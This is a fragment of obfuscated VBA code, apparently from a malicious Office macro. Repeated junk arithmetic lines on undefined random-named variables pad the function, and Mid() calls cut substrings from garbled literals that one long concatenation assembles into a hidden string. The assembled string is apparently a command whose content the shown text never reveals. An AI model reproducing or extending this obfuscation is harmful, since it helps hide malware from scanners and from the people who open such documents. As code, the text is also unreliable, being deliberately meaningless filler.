NUYQF = 871 / Rnd(4) + EmQbkWYuoIbpNa + wljsbBiS * 9 + Int(dKMtdTaFWWha * CStr(zwEQCFnIj)) + hWOpXzwwaU * CDate(3624 - 352183467 * 84 / 475) / waJfQViVTqth - CSng(620)
fNUzS = 871 / Rnd(4) + vmbGRdwjQ + krZXSPCOnRY * 9 + Int(NkLPRRfnZ * CStr(SRUHofJSnf)) + udzARRroTtI * CDate(3624 - 352183467 * 84 / 475) / iZruBLhDdEPZI - CSng(620)
qiGRWt = 871 / Rnd(4) + mkoKwZibwnf + PdCGZZHGjA * 9 + Int(ullkFmMjop * CStr(DnKmzBpGBmiH)) + sfPuQma * CDate(3624 - 352183467 * 84 / 475) / lOuYNpZokHqija - CSng(620)
YuUzkdtF = Mid("K51aBet %WpjFQCEItl", 6, 6)
CvcvZwvQmaw = 871 / Rnd(4) + LbWFVit + THOPAAowGaJbp * 9 + Int(zlHGFczpNXsO * CStr(PSOYiwr)) + jfmKhOf * CDate(3624 - 352183467 * 84 / 475) / pQjNdikwOYRndu - CSng(620)
aQWkNRKE = 871 / Rnd(4) + JlbVCmqHbk + TDEmWDAivMCUB * 9 + Int(NXwNjzClOBApR * CStr(pARYKKDNBkPTUG)) + JHRaboPutumni * CDate(3624 - 352183467 * 84 / 475) / CmjlEpvviKrpz - CSng(620)
LiisCPLqw = 871 / Rnd(4) + WmtYjsBiiwcNF + vYNUrYHLAc * 9 + Int(hPKGfDcpoPYn * CStr(zGnlBPBQfdTzD)) + mWkLlRmwc * CDate(3624 - 352183467 * 84 / 475) / YzuzXRFXlWVkk - CSng(620)
mwzFk = Mid("IMMOjmGEtfFNi&&sO0v8LvEACVGEIVv", 6, 11)
DkTYuoZjMV = 871 / Rnd(4) + LwNdwwFtjP + HaFYdXWVYwwih * 9 + Int(QtOdHimps * CStr(ujJrlkJDRwwP)) + WAmVUbYMQjMfD * CDate(3624 - 352183467 * 84 / 475) / PbjDShWiwOijn - CSng(620)
olLfP = 871 / Rnd(4) + QIYUTsHGYj + owSCCJNANKwCjc * 9 + Int(VqNjRzoAQkRAR * CStr(RqwwiwJL)) + BZVutKT * CDate(3624 - 352183467 * 84 / 475) / sraWRsp - CSng(620)
urIhWAVnY = 871 / Rnd(4) + vRlTBErdUNSNU + dAwMittbks * 9 + Int(hTsDXqkojRz * CStr(sdwzmGTkFNzAvR)) + AtvUjspUl * CDate(3624 - 352183467 * 84 / 475) / ZwWiYkFiFEijuG - CSng(620)
HrCsODHSz = Mid("NHhCYztnqQW7YuaE4zzl7nG", 8, 4)
IwziBL = 871 / Rnd(4) + vzwCSlJwt + TwECjkJnMJvEvp * 9 + Int(iYIrjzzJjizMJk * CStr(QZBzqVBqL)) + NijfWqDGGnNAF * CDate(3624 - 352183467 * 84 / 475) / wVoXTiXA - CSng(620)
KrrZZZYBERPHjG = bkHMa + OKWbPrNFp + XaRNjArptB + mwzFk + kBwmJVjwXs + CcCBaCdtpE + izEME + uzAPSfQcW + jCfjHAn + uUVchYL + owzwTH + EmJAvzS + tHSoCkC + qPJSKUEdOaB + CEUtJAC + YuUzkdtF + CDMihfVB + PKWCii + MkBCPuHv + OoNWJzwZri + msioui + NlCPsdkQj + ZRnYE + wJLTw + sjOzzR + cWIduTcLCs + vtBLdvnB + NiYDA + vvNOkI + FsOEw + IUWEuYMpaJL + cNFBCs + UUOIAM + HrCsODHSz + EvoDVTw + QbQraobTQPc + RVhvOMOcDB
CwtVDwwad = 871 / Rnd(4) + zAWVRiJstFCz + PUrAVjd * 9 + Int(cSNbjlBnFI * CStr(JiCEmaEKObp)) + zEudBLzdt * CDate(3624 - 352183467 * 84 / 475) / LViJthsIEozWnX - CSng(620)
NQFaQWPvn = 871 / Rnd(4) + PXpHAbH + mJSjVdhXSGW * 9 + Int(UbQWQkG * CStr(NXkQiiuWrk)) + dhTjiFju * CDate(3624 - 352183467 * 84 / 475) / ttEJZmfoGTr - CSng(620)
PVjRPZCwn = 871 / Rnd(4) + KfhwtTBrmRkq + iUTbrvCFQYs * 9 + Int(HzCUFChHtiNWK * CStr(TizTBHYrFww)) + LCkduGoFlWzXhO * CDate(3624 - 352183467 * 84 / 475) / jkvGwQL - CSng(620)
cYIzWlTQr = 871 / Rnd(4) + XGqfWPo + hEuziZln * 9 + Int(pGKqzhA * CStr(MUzjDmViuza)) + WMUHzPLRit * CDate(3624 - 352183467 * 84 / 475) / LjjdJhPYZqFK - CSng(620)
vrWiSYSka = 871 / Rnd(4) + PicmCqkW + vSmlAWILwibB * 9 + Int(RCZPdlssMIIA * CStr(zAXiZoCHJr)) + FWHJNWFw * CDate(3624 - 352183467 * 84 / 475) / iQaMnMwd - CSng(620)
qjJdlfZHo = 871 / Rnd(4) + FnzZHLRJG + ifpCJrmhaKr * 9 + Int(pYRahiUr * CStr(CYDALKIIOvdG)) + vLtGUutrjd * CDate(3624 - 352183467 * 84 / 475) / twaIjdmpPvj - CSng(620)
GmCwjdYMP = 871 / Rnd(4) + FUdGhaKaz + VvdHNjAckJorZ * 9 + Int(EHEVNQTUN * CStr(ndzCzDbP)) + FLLJvlzdw * CDate(3624 - 352183467 * 84 / 475) / GaNvPBaWoNj - CSng(620)
End Function
